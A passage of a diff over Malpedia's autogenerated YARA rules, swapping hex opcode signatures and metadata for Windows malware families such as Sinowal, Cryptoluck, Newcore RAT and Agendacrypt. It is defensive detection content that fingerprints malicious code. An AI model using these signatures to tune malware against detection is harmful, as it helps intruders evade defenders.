3688942b00ffffff 02d6 81e2ff000000 368a942a00ffffff 301439 } + $sequence_3 = { 368a942a00ffffff 301439 41 3b4d14 75c3 } + $sequence_4 = { 368ab42800ffffff 3688b42900ffffff 3688942800ffffff fec1 7408 } + $sequence_5 = { 368a942800ffffff 02da 368ab42b00ffffff 3688b42800ffffff 3688942b00ffffff } + $sequence_6 = { 8d7dfc b8fcfdfeff fd ab 2d04040404 e2f8 fc } + $sequence_7 = { 8bec 81c400ffffff 60 b940000000 8d7dfc b8fcfdfeff } + $sequence_8 = { 60 e8???????? 5d 81ed???????? 33c9 } + $sequence_9 = { 3c41 0f9dc2 85ca 7404 0420 8806 } + $sequence_10 = { 50 e8???????? 83c40c 6800000100 e8???????? } + $sequence_11 = { 0fb64601 84c0 7905 0d00ffffff } + $sequence_12 = { 8a06 33c9 3c5a 0f9ec1 33d2 } + $sequence_13 = { 8d45d0 50 6a01 ff7508 } + $sequence_14 = { ff7564 50 6aff 53 56 56 ffd7 } + $sequence_15 = { 8b4dfc ff75e4 03c8 51 ff15???????? } + $sequence_16 = { 68???????? ff75f4 e8???????? ff75f4 e8???????? 68???????? } + $sequence_17 = { 6a00 6a06 6a01 6a02 e8???????? 8945f0 83f8ff } + $sequence_18 = { e8???????? 6a06 ff75f8 e8???????? 8d45f4 } + $sequence_19 = { ff75f0 e8???????? c7459c44000000 8945d4 } + $sequence_20 = { e8???????? 83f800 7526 ff75f8 e8???????? 40 50 } + $sequence_21 = { 83f8ff 7466 6a05 ff75f0 } + $sequence_22 = { 6a05 ff75f0 e8???????? 83f8ff 7457 33c0 8d7d9c } + $sequence_23 = { 8945fc 83f800 0f8476010000 6804010000 6a00 ff35???????? e8???????? } + $sequence_24 = { 314508 ff560c 8b7d04 0bd8 81fbb599839e 7503 } + $sequence_25 = { 31450c 315dfc ff5634 31450c 81c75853b2b3 } + $sequence_26 = { 81ef21cfd856 2bd8 81ff1ac8cfd4 0f84ac000000 } + $sequence_27 = { 0f8418010000 8365f000 6850020000 6a08 ff750c ff5604 } + $sequence_28 = { ff560c 0faff8 8b456c 8b00 89456c ff5638 0fafd8 } + $sequence_29 = { 3d00010000 7322 888405ecfeffff ff560c } + $sequence_30 = { 81fb15af295e 0f85ae000000 81ef52eceb06 ff5634 8bd8 81cb15af295e 8b45fc } + $sequence_31 = { ff5634 8b4d0c 81c951dbc951 0fafc1 89450c } condition: - 7 of them and filesize <425984 + 7 of them and filesize <204800 } -rule MALPEDIA_Win_Newbounce_Auto : FILE +rule MALPEDIA_Win_Darkmoon_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "70b5f47a-ee55-5897-8fcd-06a813c41881" + id = "c7bc3212-028b-5215-8293-c0df2749aba3" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.newbounce" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.newbounce_auto.yar#L1-L151" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkmoon" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.darkmoon_auto.yar#L1-L116" license_url = "N/A" - logic_hash = "53d4154f041c8f5d8c7be0de086b650af8bff8de758570421d79234a0be341f3" + logic_hash = "5987f0c1a065561468c6153b43a5b63a22d14e5454b4b93cd49fdb8fd5a12783" score = 75 quality = 75 tags = "FILE" @@ -146332,37 +149165,32 @@ rule MALPEDIA_Win_Newbounce_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 83e00f 7e05 2bf0 83c610 } - $sequence_1 = { ff15???????? 85c0 0f844b010000 ba28000000 } - $sequence_2 = { ff15???????? 85c0 0f8437020000 8b4c2428 } - $sequence_3 = { ff15???????? 85c0 0f8436020000 4889bc2428010000 c784242001000022000000 c784241801000073252000 c78424100100006b2d2000 } - $sequence_4 = { 75f5 49ffc8 75eb 488d8104020000 } - $sequence_5 = { e8???????? cc b201 488bcf e8???????? 4c8d1d8f920100 488d5547 } - $sequence_6 = { 75f2 ebe3 488d154ac20100 498bcc 4d8bc7 } - $sequence_7 = { 75f5 49ffc9 75e8 488d8e54030000 } - $sequence_8 = { 81e3c0000000 0bf3 c1ee06 0b14b5b0876300 } - $sequence_9 = { 81e300000600 c1ea14 8b1495b0896300 81e6000f0000 } - $sequence_10 = { 81e300e00100 0bf3 c1ee0d 0b0cb5b0886300 } - $sequence_11 = { 81e2ff000000 8b0c8d48436300 8b1c9d48476300 33cb 8b1c85484b6300 2bcb } - $sequence_12 = { 81e2ff000000 c1e808 c1e208 53 } - $sequence_13 = { 81e3001e0000 8bef 81e50000e001 0bf5 c1ee15 8b34b5b08d6300 } - $sequence_14 = { 81e3001e0000 8bd5 81e280010000 0bda 8b14b5b08d6300 } + $sequence_0 = { c745e435000000 e8???????? 83c418 85c0 } + $sequence_1 = { 7432 8d55e4 8d45e8 52 8d4dec 50 8d95e4fdffff } + $sequence_2 = { 8dbe48010000 6800f00000 8bcf e8???????? 6800f00000 8bce } + $sequence_3 = { 7314 ff7510 ff750c ff7508 } + $sequence_4 = { c645fc03 e8???????? 8d4f08 c645fc04 e8???????? } + $sequence_5 = { c645fc07 e8???????? eb02 33ff 57 c645fc01 } + $sequence_6 = { 83ec10 33c9 8bdc 33d2 8dbe48010000 } + $sequence_7 = { 8d860f040000 8945cc eb12 8d86130d0000 } + $sequence_8 = { 837df020 750e 8dbdfcfdffff c60720 } + $sequence_9 = { 50 837df400 740d 6800800000 6a00 ff75f4 ff5625 } condition: - 7 of them and filesize <8637440 + 7 of them and filesize <98304 } -rule MALPEDIA_Win_Dmsniff_Auto : FILE +rule MALPEDIA_Win_Rambo_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "16f341e6-77a3-5816-ba96-baf125c04244" + id = "9952c16f-0ad8-5b79-a375-78c277443f5b" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dmsniff" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.dmsniff_auto.yar#L1-L124" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rambo" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.rambo_auto.yar#L1-L172" license_url = "N/A" - logic_hash = "97dafc3ba62eb5e1ea05a655f64eed9d043aae4b3733a53f196189f18ab4ea03" + logic_hash = "289c05fe82444eba5e21e680847ee18f8bd6fcd3320474143e269d581daca21f" score = 75 quality = 75 tags = "FILE" @@ -146376,32 +149204,38 @@ rule MALPEDIA_Win_Dmsniff_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 83c661 89f3 881d???????? 8d04bf } - $sequence_1 = { 50 d93c24 66810c240003 d92c24 83c404 6a00 6a00 } - $sequence_2 = { 53 56 57 8b5d0c 8b7510 } - $sequence_3 = { 89fe 46 89b5fcfeffff 899cbd00ffffff 8d85f0feffff 50 6a00 } - $sequence_4 = { eb15 47 39f7 72d3 ff45fc 8b45f4 3945fc } - $sequence_5 = { 56 57 8965e8 50 d93c24 } - $sequence_6 = { eb18 68???????? e8???????? 50 68???????? e8???????? 83c40c } - $sequence_7 = { e8???????? 50 68???????? e8???????? 83c40c eb18 } - $sequence_8 = { e8???????? 83c40c eb18 68???????? e8???????? 50 } - $sequence_9 = { 7316 8bbdfcfeffff 89fe 46 89b5fcfeffff 899cbd00ffffff } + $sequence_0 = { ff7508 e8???????? 59 50 ff7508 ff15???????? 56 } + $sequence_1 = { e8???????? ff750c 8d85ecfdffff 50 e8???????? } + $sequence_2 = { ff15???????? 83c41c 6a01 58 5e c9 } + $sequence_3 = { 85f6 7437 56 6a01 } + $sequence_4 = { ff7508 8d85f8feffff 50 e8???????? 8065fe00 8d45fc 50 } + $sequence_5 = { 83c428 6a32 ff15???????? 8d85f8faffff 50 68???????? } + $sequence_6 = { 56 57 8d85f8faffff 6a01 50 ff15???????? 80a43df8faffff00 } + $sequence_7 = { 50 8d85f8feffff 50 c645fc72 } + $sequence_8 = { 756b 57 b940000000 8d7c240d 8844240c f3ab } + $sequence_9 = { f3aa 8bcb 8d7c2474 8bc1 } + $sequence_10 = { e8???????? 8d4c2410 c684240004000007 e8???????? 68b6000000 8d542414 } + $sequence_11 = { 8d8c2488000000 e8???????? 57 57 8d4c2424 } + $sequence_12 = { e8???????? 8d4c2428 c684240004000005 e8???????? 8d4c2414 c684240004000004 } + $sequence_13 = { 8b35???????? a3???????? ffd6 3db7000000 7418 } + $sequence_14 = { 89442418 8b4309 84c9 7403 50 } + $sequence_15 = { f3a5 8bcb 8d9424f8020000 83e103 f3a4 bf???????? 83c9ff } condition: - 7 of them and filesize <131072 + 7 of them and filesize <57344 } -rule MALPEDIA_Win_Socks5_Systemz_Auto : FILE +rule MALPEDIA_Win_Newcore_Rat_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "11fdca9d-b672-58c8-b928-df2c27b8d2c6" + id = "665a19c1-0b9c-5837-8284-a9e9fed7fabd" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.socks5_systemz" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.socks5_systemz_auto.yar#L1-L97" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.newcore_rat" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.newcore_rat_auto.yar#L1-L129" license_url = "N/A" - logic_hash = "c567898c7f496303ddbf924e08954da7846c60ee6266bcbd0213f34733b6e6b6" + logic_hash = "bc0ab135cc137a5ffe441affd5712e460cc93f003c5dd205f806c56bc27b56a3" score = 75 quality = 75 tags = "FILE" @@ -146415,30 +149249,32 @@ rule MALPEDIA_Win_Socks5_Systemz_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 50 64892500000000 83ec14 894df0 8b45f0 83c018 } - $sequence_1 = { 8b45c8 c6041000 b901000000 6bd100 8b8500feffff } - $sequence_2 = { 8b45d4 8945e0 8b4ddc 51 } - $sequence_3 = { 8b45d8 8945f0 837df000 7413 } - $sequence_4 = { 8b45cc c6041000 b901000000 6bd100 8b45c8 c6041000 } - $sequence_5 = { 8b45cc 50 e8???????? 59 c3 8d4dd8 } - $sequence_6 = { 8b45d0 e9???????? e9???????? 837dcc00 } - $sequence_7 = { 8b45d8 50 8b4df0 83c124 } + $sequence_0 = { 8b08 8b11 50 8b4204 ffd0 8d4c2414 e8???????? } + $sequence_1 = { 898670300000 e8???????? 5f 5d b801000000 } + $sequence_2 = { 51 8d4c243c e8???????? 8d4c2414 e8???????? 8b542448 52 } + $sequence_3 = { 50 8d4c245e 51 6689442460 e8???????? 83c40c 6a30 } + $sequence_4 = { 6a00 6a00 8d542478 52 6a00 ff15???????? 85c0 } + $sequence_5 = { 8b442450 e9???????? 6830020000 8d442458 6a00 50 } + $sequence_6 = { 8b8610100000 85c0 740d 50 ffd7 c7861010000000000000 } + $sequence_7 = { 5b c21000 8d9344020000 68???????? 52 e8???????? 8bf0 } + $sequence_8 = { 83c40c 03f9 014c2414 eb04 8b5c240c 014c242c b81f85eb51 } + $sequence_9 = { 68???????? 8d9424ac060000 e8???????? 83c408 53 8d8c24a8060000 } condition: - 7 of them and filesize <491520 + 7 of them and filesize <581632 } -rule MALPEDIA_Win_Cryptoluck_Auto : FILE +rule MALPEDIA_Win_Cargobay_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "a59fe2e6-4321-5ca6-b53f-4f7ee8914f9a" + id = "73c95842-79c7-50a5-be49-1d9ec0676b5e" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptoluck" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.cryptoluck_auto.yar#L1-L126" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cargobay" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.cargobay_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "6db6bc0e7d4030ac1b4c7c7367ac728b4b155db8cbff6f59645d89ef531abf3a" + logic_hash = "6881c841016fbba7262559cf71fef612762f65200b77d9ecbf913cbcf1cd6281" score = 75 quality = 75 tags = "FILE" @@ -146452,32 +149288,32 @@ rule MALPEDIA_Win_Cryptoluck_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 7409 c745d880720010 eb07 c745d878720010 837d1000 7409 c745d475720010 } - $sequence_1 = { 44 15f40010ff 35ec001eff 20d7 59 392d???????? 1288ff35d403 } - $sequence_2 = { 8b85e4fbffff 50 e8???????? 83c408 8985c4fbffff 83bdc4fbffff00 } - $sequence_3 = { 8b4df8 51 ff15???????? 85c0 7431 8b550c } - $sequence_4 = { 85c0 0f84e8000000 c745ec00000000 8d45ec 50 8d4df0 51 } - $sequence_5 = { ff15???????? 85c0 7419 8b4d14 } - $sequence_6 = { 99 2bc2 8bc8 d1f9 8b45ac 99 2bc2 } - $sequence_7 = { ff15???????? 8b0d???????? 51 8b95c8fdffff 52 68ff0f0000 } - $sequence_8 = { c60000 8b4de0 83c101 894de0 8b55dc } - $sequence_9 = { ff15???????? 8985e8faffff 83bde8faffffff 0f84d9000000 b8424d0000 668985d4faffff 8b8df4faffff } + $sequence_0 = { e9???????? 4c8b4910 31c0 4c01ca 7216 48395108 7210 } + $sequence_1 = { 80bc24b100000000 0f84e2020000 8a8c24b2000000 0fb6d1 83fa2c 743e b800000000 } + $sequence_2 = { e8???????? eb56 488db42498010000 41b8b8000000 4889f1 4c89fa e8???????? } + $sequence_3 = { c6040800 48ffc1 ebf2 488b4748 41b801000000 4889f9 4c89e2 } + $sequence_4 = { eb04 48832300 4889f1 4c89f2 4883c448 5b 5d } + $sequence_5 = { e8???????? 0f0b 56 57 4881ec18040000 4889ce 488d7c2428 } + $sequence_6 = { ba05000000 e8???????? e9???????? 488d0dddfe0d00 ba09000000 e8???????? 4889c3 } + $sequence_7 = { c5fa6f8729020000 c4e27d470d???????? c4e27d4505???????? c5fd6f15???????? c4e26d36c0 c5fdebc1 c5fddb05???????? } + $sequence_8 = { 4d896608 488d8c2488000000 488919 48897108 48898424b0000000 4889bc24b8000000 4d8937 } + $sequence_9 = { ba08000000 41b908000000 e8???????? 4881c600020000 4889f1 4c89f2 e8???????? } condition: - 7 of them and filesize <229376 + 7 of them and filesize <3432448 } -rule MALPEDIA_Win_Retro_Auto : FILE +rule MALPEDIA_Win_Sinowal_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "a4751029-21e3-5dc7-8b10-667fe3852f4c" + id = "31384acf-e07e-5abe-adce-b44a77e374ec" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.retro" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.retro_auto.yar#L1-L130" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sinowal" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.sinowal_auto.yar#L1-L122" license_url = "N/A" - logic_hash = "a167f37f4c1b5df11b8ae00c368ae3ba7079a871854da90fb0bcfd20e0f3d7b0" + logic_hash = "42d79ca235acd4d3a743286e206901b01ddea7a50a0ec3cebf0e0027f96ae13f" score = 75 quality = 75 tags = "FILE" @@ -146491,32 +149327,32 @@ rule MALPEDIA_Win_Retro_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 49ffcb 8941ec 418b440af0 8941f0 418b440af4 } - $sequence_1 = { 8b442420 4863c8 ba04000000 e8???????? 4c8bb42478400000 4c8ba42480400000 488bb42488400000 } - $sequence_2 = { 488b742468 488dab00120000 f30f100d???????? 4963c5 448b848308130000 418d4701 410fafc0 } - $sequence_3 = { f30f58c2 f30f58c1 f30f58c5 4883c478 c3 660feb15???????? f30f5c15???????? } - $sequence_4 = { f3410f1081f8550100 410f2fc0 7604 f30f59e8 8d442eff 4863c8 } - $sequence_5 = { 418bd4 e8???????? 33c9 85c0 0f8514010000 4c8d2df2e70300 } - $sequence_6 = { f30f59e8 418d4424ff 4863c8 483bcd 7c2e 0f1f00 660f6e0c8b } - $sequence_7 = { 4881c460260000 415f 415e 415d 5f 5e 5b } - $sequence_8 = { 48c1f905 4c8d05db7f0500 83e21f 486bd258 490314c8 488d0d79700200 eb11 } - $sequence_9 = { f20f1035???????? 0f297c2430 0f57ff 33ff 83bab412000002 488bda 4c8bc9 } + $sequence_0 = { 8d95bcfdffff 52 e8???????? 83c40c c745f000000000 } + $sequence_1 = { 8b450c 8b4d08 8d5401ff 8955fc eb12 8b4508 83c001 } + $sequence_2 = { c745f400000000 c745f800000000 8b4510 8945fc 8b4510 33d2 b908000000 } + $sequence_3 = { 6a00 8b45f8 50 ff15???????? 8b45f4 } + $sequence_4 = { 8b0495d0669600 2500000080 8b4df8 8b148dd4669600 81e2ffffff7f 0bc2 } + $sequence_5 = { 8945d8 c745e400000000 c745fc00000000 68???????? } + $sequence_6 = { 837d0800 7406 837d0c00 7502 eb64 8b450c } + $sequence_7 = { 89048dd0669600 8b55fc 8b45fc 8b0c85d0669600 890c95d0669600 8b55fc } + $sequence_8 = { 890d???????? c705????????00000000 a1???????? 8b0c85d0669600 894dfc } + $sequence_9 = { c745f400000000 c745f800000000 c745fc00000000 837d0800 7416 837d0c00 7410 } condition: - 7 of them and filesize <1409024 + 7 of them and filesize <73728 } -rule MALPEDIA_Win_Revenant_Auto : FILE +rule MALPEDIA_Win_Hlux_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "a1374c5f-49ed-5419-afea-48c7289282d4" + id = "0554b2ef-0799-5994-8001-d3a987727985" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.revenant" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.revenant_auto.yar#L1-L117" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hlux" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.hlux_auto.yar#L1-L158" license_url = "N/A" - logic_hash = "c5089ea5b4a1f250ceb154edb995f0fd96a084eb423c884f131dc135f20dbca0" + logic_hash = "53ff7358e541a46f4d140f6dc71959f0fd15f8b04731bebe36051fa435d4979d" score = 75 quality = 75 tags = "FILE" @@ -146530,34 +149366,40 @@ rule MALPEDIA_Win_Revenant_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 4c8d4c2458 4889f1 4889c3 31c0 4889442420 4889da ff15???????? } - $sequence_1 = { 4c89e1 e8???????? 488906 31c0 48894608 } - $sequence_2 = { ba28000000 b940000000 ffd6 31d2 } - $sequence_3 = { eb3a 4c89e1 e8???????? 488906 31c0 } - $sequence_4 = { 4889442450 e8???????? 85c0 4189c7 } - $sequence_5 = { 4c01c2 31c9 49f7d0 48ffc9 4939c8 740a 448a140a } - $sequence_6 = { 41b842000000 4c89e1 ff15???????? 8b4c246c 4989c4 } - $sequence_7 = { 8b00 41390424 7592 41c744240801000000 } - $sequence_8 = { 4883c328 4839fb 7427 41b808000000 4889f2 4889d9 } - $sequence_9 = { e8???????? ba04010000 b940000000 48c744242804010000 41ffd6 4885c0 } + $sequence_0 = { 81f949e2a499 750b 83f90e 7406 } + $sequence_1 = { 0101 c9 c3 6a10 } + $sequence_2 = { 0009 1b4e01 e405 9d } + $sequence_3 = { 0088aa4b0023 d18a0688078a 46 018847018a46 } + $sequence_4 = { 0130 8b13 8b08 85d2 } + $sequence_5 = { b8e3062de4 09c0 7506 898550ffffff 8b8550ffffff ba205af5bb } + $sequence_6 = { 7545 8945fc 8b45f0 895de8 81f97a701028 7534 } + $sequence_7 = { 0104b9 33c9 83c408 85c0 } + $sequence_8 = { 010f 840f 0000 008365f0fe8b } + $sequence_9 = { 8b0d???????? 85c9 753f 83f963 753a 8945fc 83f93f } + $sequence_10 = { 0104bb 8d1447 89542418 e9???????? } + $sequence_11 = { 895de8 33f6 8955cc 83fe13 7503 8975fc 5e } + $sequence_12 = { 0000 008365f0fe8b 4d 0883c108e918 } + $sequence_13 = { 8945e0 83f9f3 7507 09c9 7403 } + $sequence_14 = { 81fb2e5ca766 7503 895de8 8945d4 } + $sequence_15 = { 83fbd5 7413 33c0 83f827 7403 } condition: - 7 of them and filesize <99328 + 7 of them and filesize <3147776 } -rule MALPEDIA_Win_Helauto_Auto : FILE +rule MALPEDIA_Win_Dadjoke_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "8190d0b6-60e2-55b8-bbd3-4f8143a5c37c" + id = "62c26982-fdfa-5ead-84fa-82086121c261" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.helauto" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.helauto_auto.yar#L1-L119" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dadjoke" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.dadjoke_auto.yar#L1-L224" license_url = "N/A" - logic_hash = "4d9d81740e3a201d5c095a9d2008fa9ef0381381c707cf34a732c2ace99e1c38" + logic_hash = "551e5b1afd2fb8a5c55119844d05872b1d6fb1f0561b620ba9bad0b2cb1592e0" score = 75 - quality = 75 + quality = 73 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -146569,32 +149411,44 @@ rule MALPEDIA_Win_Helauto_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b45d4 83c40c 898568ffffff 8b45d0 } - $sequence_1 = { ff75ec ffd6 6830750000 eb48 } - $sequence_2 = { 69c060ea0000 83c430 3d60ea0000 a3???????? } - $sequence_3 = { 85c0 0f841f010000 8b3d???????? 6a05 8d85a8f3ffff 68???????? } - $sequence_4 = { 59 50 8d8574ffffff 50 53 53 ff75fc } - $sequence_5 = { 85c0 7508 53 ff15???????? 59 33c0 } - $sequence_6 = { 50 ff15???????? 83c40c 85c0 0f8593000000 50 } - $sequence_7 = { 68???????? 50 ff15???????? 83c40c 85c0 0f8593000000 } - $sequence_8 = { 8d4608 50 68???????? 53 e8???????? 83c418 83feff } - $sequence_9 = { 51 8d4df0 e8???????? 8365fc00 8d4df0 } + $sequence_0 = { 56 57 6800081000 6a00 } + $sequence_1 = { 8b55bc 52 6800040000 8d8518f5ffff 50 e8???????? } + $sequence_2 = { 3d46270000 7406 837dd800 752c } + $sequence_3 = { 8345bc01 807df600 75ed 8b7dbc 8bb570ffffff 8b956cffffff } + $sequence_4 = { 6a00 6a00 ff15???????? 8945c0 6a00 6a01 } + $sequence_5 = { ff15???????? 8945fc 8b4dfc 51 e8???????? 83c404 } + $sequence_6 = { e8???????? 83c40c 8d8d28fdffff 51 e8???????? 83c404 } + $sequence_7 = { 5e c3 8bff 55 8bec 83ec10 33c0 } + $sequence_8 = { ff15???????? 85c0 7417 b920000000 } + $sequence_9 = { e8???????? c3 6a04 e8???????? 59 c3 6a0c } + $sequence_10 = { 84c0 0f94c1 8bc1 c3 a1???????? c3 8bff } + $sequence_11 = { e8???????? 83c40c c7458c00000000 ff15???????? 50 e8???????? } + $sequence_12 = { 8b3d???????? 8b1d???????? 51 e8???????? 8bf0 83c404 } + $sequence_13 = { 6a40 6800100000 6800004000 6a00 } + $sequence_14 = { 0f84d5480000 c3 833d????????ff 7503 33c0 } + $sequence_15 = { 7ce7 8d45f4 c645f800 33db 8d7001 33d2 } + $sequence_16 = { 8b85e4faffff 8d95e0faffff 52 68???????? 50 8b08 } + $sequence_17 = { 8d85e4faffff 50 68???????? 6a01 6a00 68???????? ff15???????? } + $sequence_18 = { 884435f4 46 83fe04 7ce7 8d45f4 c645f800 } + $sequence_19 = { c745fc14000000 0f1106 894610 8d45fc } + $sequence_20 = { 5f 0f44ca 5b 8bc1 5e 5d c3 } + $sequence_21 = { 83e13f c1f806 6bc930 8b048558047500 } condition: - 7 of them and filesize <57344 + 7 of them and filesize <344064 } -rule MALPEDIA_Win_Enigma_Loader_Auto : FILE +rule MALPEDIA_Win_Pykspa_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "33d20d9c-767a-597b-ae66-93f6af0c58cb" + id = "c344e44d-277b-5916-93ac-fe5b84ee097a" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.enigma_loader" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.enigma_loader_auto.yar#L1-L131" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pykspa" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.pykspa_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "8a62893fbe7653f384c2f95eb23ec8773d32568e91ea2e5850c81f2ea0184b8d" + logic_hash = "ae1a9dadb1337e6c1ef760caa0d42ce5c68005bd2830f1ee498d2437086c9f33" score = 75 quality = 75 tags = "FILE" @@ -146608,32 +149462,32 @@ rule MALPEDIA_Win_Enigma_Loader_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b05???????? 33ff 66393d???????? 41bc09cb3d8d 0f1145ea 8945fa 448d770a } - $sequence_1 = { 0f840c010000 488b01 4c8d4de0 4c8d4520 488d5530 ff5010 84c0 } - $sequence_2 = { e9???????? 488b8aa0000000 4883c108 e9???????? 488b8aa0000000 4883c120 e9???????? } - $sequence_3 = { 488d542478 488bcf e8???????? 90 41c6466801 4138b6b0000000 0f85e2040000 } - $sequence_4 = { 488d05dfab0200 e9???????? 488d0523ac0200 eb7c 488d056aac0200 eb73 } - $sequence_5 = { 498b4210 448b10 410fb609 83e10f 4a0fbe843178940200 428a8c3188940200 4c2bc8 } - $sequence_6 = { 4d8b86c8000000 4c898558020000 488b4610 48394608 7529 488b0e 8a11 } - $sequence_7 = { cc 33c0 4c8d1d8fbafeff 884118 0f57c0 } - $sequence_8 = { 33d2 33c9 ffd0 4889842420010000 4885c0 7510 bab9fa0e75 } - $sequence_9 = { 773b 498bc8 e8???????? 488b6c2458 4a8d0ce3 48891f 498bc6 } + $sequence_0 = { 8b5c240c 57 8b7c240c 3bfb 7513 57 8b7c2418 } + $sequence_1 = { 6a00 c6400e01 ff15???????? cc 55 8bec b89c110000 } + $sequence_2 = { c3 a1???????? 85c0 7501 c3 8b4818 85c9 } + $sequence_3 = { 381d???????? 8b2d???????? 744f 8d442418 68???????? 50 e8???????? } + $sequence_4 = { c60000 807d0000 0f843b010000 57 ff742414 e8???????? 50 } + $sequence_5 = { 0f95c0 5e c3 55 8bec 83ec54 53 } + $sequence_6 = { ff15???????? 8b35???????? 53 ffd6 8b3d???????? 53 ffd7 } + $sequence_7 = { 381d???????? 7508 381d???????? 743e 56 ff15???????? 83f805 } + $sequence_8 = { 8d85acfeffff 68???????? 50 e8???????? 85c0 59 59 } + $sequence_9 = { 6a05 8bca 33d2 f7f3 8bc7 bb40e20100 03ca } condition: - 7 of them and filesize <798720 + 7 of them and filesize <835584 } -rule MALPEDIA_Win_Gold_Dragon_Auto : FILE +rule MALPEDIA_Win_Agendacrypt_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "eec5e3d6-5655-50ac-8840-a288ffff9f65" + id = "20fa12ae-39fc-589c-ac17-0baa3bbfd44a" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gold_dragon" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.gold_dragon_auto.yar#L1-L117" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.agendacrypt" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.agendacrypt_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "eed1b3c473c88d18a03100aac4bac22cf30de04dad45247c9c63eb23fa6434a1" + logic_hash = "b4f726649ba175df63b497d8d60f55fe36fe0cd2719e493aac65ae353f8a7651" score = 75 quality = 75 tags = "FILE" @@ -146647,34 +149501,34 @@ rule MALPEDIA_Win_Gold_Dragon_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? 8bc6 83e61f c1f805 59 8b048500954000 8d0cf6 } - $sequence_1 = { 85c0 a3???????? 0f848d030000 8b15???????? 68???????? } - $sequence_2 = { 0fb6fa 3bc7 7714 8b55fc 8a9200844000 } - $sequence_3 = { a3???????? 0f842d040000 8b15???????? 68???????? } - 